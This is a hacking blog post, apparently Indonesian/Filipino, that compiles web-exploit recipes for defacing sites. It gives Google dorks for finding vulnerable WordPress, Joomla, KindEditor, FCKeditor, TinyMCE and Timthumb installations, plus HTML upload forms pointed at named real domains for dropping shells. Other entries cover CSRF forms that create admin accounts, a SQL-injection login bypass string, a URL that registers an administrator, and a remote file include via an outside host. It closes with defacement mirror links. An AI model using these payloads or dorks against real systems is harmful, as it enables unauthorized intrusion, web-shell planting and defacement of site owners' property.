HY hack: Deface dengan Teknik Remote File Upload Exploit Vulnerability - Berita Hack trik, dan Pulsa Gratis Asiapoker77 jackpot plus. This bug in ( KindEditor ) you can upload remote files (.txt.html.etc ) with multiple JSON upload langs type ( PHP / ASP / JSP / ASP.NET ) this bug found in old versions by some author, but is still work is latest version. Is ( 4.1.5 ), Released on ( Jan 19, 2013 ).
- wordpress
- dork: /wp-admin/install.php
- example:
- dork: inurl:/wp-content/themes/project10-themes/
- exploit script:
- <form enctype='multipart/form-data' action='http://ogrencikariyeri.com/haber/wp-content/themes/project10-theme/functions/upload-handler.php' method='post'>Please Choose a File: <input name='orange_themes' type='file' /><br/ >
- path: http://127.0.0.1/wordpress/wp-content/uploads/year/month/up.php
- need tamper
- Exploit Title: Baruque Casa Remote File Upload Vulnerability # Google Dork: intext:Copyright Baruque Casa. # Exploit Author: Mr.T959 # Author Website : http://mr-t959.xyz # Tested on: Windows 7 -------------------------------------- # Exploit HTML Code :
- <form method='post' target='_blank' action='http://www.baruquecasa.com.br/admin/server/php/' enctype='multipart/form-data'> <input type='file' name='files[]'><input type='submit' name='g' value='Upload Cok!'></form>
- # Exploit admin/server/php/ # Successful {'files[{'name':'b6fa0f07f57514815d1b310a6b97d70e.jpeg','size':5362,'type':'image/jpeg','url':'http://www.baruquecasa.com.br/admin/server/php/fotos/b6fa0f07f57514815d1b310a6b97d70e.jpeg' # Error {'files':[{'name':'geo.php','size':3468,'type':'application/octet-stream','error':'Filetype not allowed'}]} # Demo http://www.baruquecasa.com.br/admin/server/php/
- #Author Website:-HTTP://WWW.HACKERWAHAB.COM/
- #Exploit Title: Exploit Wordpress Arbitrary File Upload Vulnerability in Vertical SlideShow
- #Google Dork : inurl:/wp-content/plugins/wp-vertical-gallery/
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!Exploit!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- <html>
- <form action='http://www.sparkdesign.com/wp-admin/admin.php?page=vertical_manage' method='POST' enctype='multipart/form-data'>
- <input type='hidden' name='task' value='vrt_add_new_album' />
- <input type='hidden' name='album_name' value='Arbitrary File Upload' />
- <input type='hidden' name='album_desc' value='Arbitrary File Upload' />
- <input type='submit' value='Submit' />
- </body>
- jquery xploit
- By Clash Hackers:
- Dork : /assets/global/plugins/jquery-file-upload/
- Exploit : http://localhost/assets/global/plugins/jquery-file-upload/server/php/
- Script CSRF :
- <form method='POST' action='http://localhost/assets/global/plugins/jquery-file-upload/server/php/'
- <input type='file' name='files[]' /><button>Upload</button>
- xploiter: /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
- xploit uploader:
- <DOCTYPE! html>
- <html> <form name='f' method='post' enctype='multipart/form-data' action='https://copypaste.ph/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload'> <table width='100%' cellpadding='0' cellspacing='0' border='0'> <tr> <td>Nueva imagen:</td> <td><input name='file' type='file' size='30'></td> <td align='right'> <input type='submit' name='submit' value='Transferir'> </td> </tr> </table> </form> </td> </tr> <tr> <td> </td> </tr> </table> </body> </html>
- CSRF XPLOIT
- action='http://localhost/zeuscart-master/admin/?do=adminprofile&action=update'
- <input type='hidden' name='admin_name' value='admin2'>
- <input type='hidden' name='admin_email' value='[email protected]'>
- <input type='hidden' name='admin_password' value='admin'>
- <script>document.myform.submit();</script>
- Exploit Title: CSRF Vulnerability (Tinymce plugins imgsurfer) Version: 4.1.2 Date: 1-01-2018 Tested on: Linux Google Dork: inurl:/tinymce/plugins/imgsurfer/ Video Poc:https://www.youtube.com/watch?v=pL-0-fmDVCE&t=213s Category: webapps Exploit Author: Legion BOmb3r contact:[email protected] Greetz to my team ErrOr SquaD https://www.tinymce.com/ ################################################## Description The vulnerability allows an attacker upload shell ..... Proof of Concept: http://www.site.com/tinymce/plugins/imgsurfer/main.php CSRF code:
- <html> <form name='f' method='post' enctype='multipart/form-data' action='http://www.site.com/tinymce/plugins/imgsurfer/main.php'> <table width='100%' cellpadding='0' cellspacing='0' border='0'> <tr> <td>Nueva imagen:</td> <td><input name='file' type='file' size='30'></td> <td align='right'> <input type='submit' name='submit' value='Transferir'> </td> </tr> </table> </form> </td> </tr> <tr> <td> </td> </tr> </table> </body> </html>
- Google dork: inurl:/wp-content/plugins/viral-optins/
- Exploit: https://127.0.0.1/wp/wp-content/plugins/viral-optins/api/uploader/file-uploader.php
- <form method='POST' action='https://127.0.0.1/wp/wp-content/plugins/viral-optins/api/uploader/file-uploader.php' enctype='multipart/form-data' >
- <input type='submit' name='Submit' value='Upload'>
- Dork : /index.php/index/user/register
- -----------------------------------
- -----------------------------------
- Path Shell : /files/journals/1/articles/(ID)/submission/original/(Random nama shell .phtml)
- inurl:admin/fckeditor site:pl
- http://alexan.com.ph/mailinglist_new/admin/FCKeditor/editor/filemanager/browser/default/browser.html?
- idugtong sa browser.htl connector=connectors/asp/connector.php
- xploit: /sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx
- dork: inurl:'/sitefinity/login.aspx'
- /assets/js/plugins/ckeditor/plugins/imageuploader/imgbrowser.php
- wp xploit
- 1.ilagay lng sa dulo ng site ung
- dork: inurl: wp-content/upload/job-manager-uploads/
- sample:https://unhrd.org/post-a-job/
- #Exploit Author:- HACKER WAHAB
- #Exploit Title: Exploit Wordpress Arbitrary File Upload Vulnerability in Vertical SlideShow
- #Google Dork : inurl:/wp-content/plugins/wp-vertical-gallery/
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!Exploit!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- <html>
- <form action='http://www.sparkdesign.com/wp-admin/admin.php?page=vertical_manage' method='POST' enctype='multipart/form-data'>
- <input type='hidden' name='task' value='vrt_add_new_album' />
- <input type='hidden' name='album_name' value='Arbitrary File Upload' />
- <input type='hidden' name='album_desc' value='Arbitrary File Upload' />
- <input type='submit' value='Submit' />
- </body>
- +++++++++++++++++++++++++++++++
- path: /sites/default/files/webform/yunghtmlmo.html
- Inurl: /wp-content/plugins/woocommerce-product-options/includes/image-upload.php
- ++++++++++++++++++++++++++++++++
- ●inurl:/wp-content/themes/purevision/sliders/
- Exploit : /wp-content/themes/purevision/scripts/admin/uploadify/uploadify.php
- Dork :
- - inurl:/administrator/ intitle:login
- test: http://www.lenovoshowroomtelangana.in/administrator/
- bypass admin
- Username : '='or' atau '=' 'or'
- Dork = inurl:wp-content/themes/qaengine
- Exploit = /wp-admin/admin-ajax.php?action=ae-sync-user&method=create&user_login=username&user_pass=password&role=administrator
- admin/FCKeditor/ xploit working
- xploiter: site.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php
- dork: inurl:advert_detail.php?id=
- Joomla xploit working
- dork: inurl:viewtable?cid= site:it
- lagay mo sa link nasa baba
- /index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0&Itemid=0
- elfinder/files xploit
- dork: inurl: 'elfinder/files'
- xploiter: http://www.simplifieddigitalmarketing.com/asu.php
- Timthumb exploit working
- vul version 1.30
- dork: inurl:/timthumb.php?src=
- 1.find timthumb.php source
- ?src=http://flickr.com.phuoclongcomputer.com/up.php
- ++++++++++++++++++++++++++++++++++
- Save the file as html :) Exploit Title: Arbitrary File Upload Vulnerability in Estatik <br>
- <br> <br> Exploit : <br><hr>
- <html> <body> <form action='www.TARGET.com/wp-admin/admin-ajax.php' method='POST' enctype='multipart/form-data'> <input type='hidden' name='action' value='es_prop_media_images' /> <input type='file' name='es_media_images[]' /> <input type='submit' value='Submit' /> </form> </body> </html>
- ++++++++++++++++++++++++++++++++++
- # Google Dork : inurl:/wp-content/plugins/wp-dreamworkgallery/
- shell path:/wp-content/uploads/dreamwork/7_uploadfolder/big/shellname.php
- exploit
- <body>
- <form action='http://www.site.com/wp-admin/admin.php?page=dreamwork_manage' method='POST' enctype='multipart/form-data'>
- <input type='hidden' name='task' value='drm_add_new_album' />
- <input type='hidden' name='album_name' value='Arbitrary File Upload' />
- <input type='hidden' name='album_desc' value='Arbitrary File Upload' />
- <input type='submit' value='Submit' />
- </body>
- dork: inurl: /wp-content/plugins/Tevolution/tmplconnector/monitize/templatic-custom_fields/Demo
- action='http://site.com/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/single-upload.php'
- enctype='multipart/form-data'>
- <input type='file' name='Filedata' ><br>
- <input type='submit' name='submit' value='Upload'>
- Joomla Arbitrary File Upload Vulnerability
- # 1:Search Google Dork and Choose a Target
- # 2: exploit:
- /index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0&Itemid=0
- # 4: Poc: http://www.localhost.com/media/index.... or http://www.localhost.com/media/shell.php
- http://www.aquoschemical.it/sito/medi...
- https://web.facebook.com/FOXILITRIX.0
- http://www.ghostshockey.it/media/r3dfl4g.html
- http://www.nordnetimmobiliare.it/media/r3dfl4g.html
- https://mirror-h.org/zone/1504323/
- ~R3DFL4G~
- ++++++++++++++++++++++++++++++++++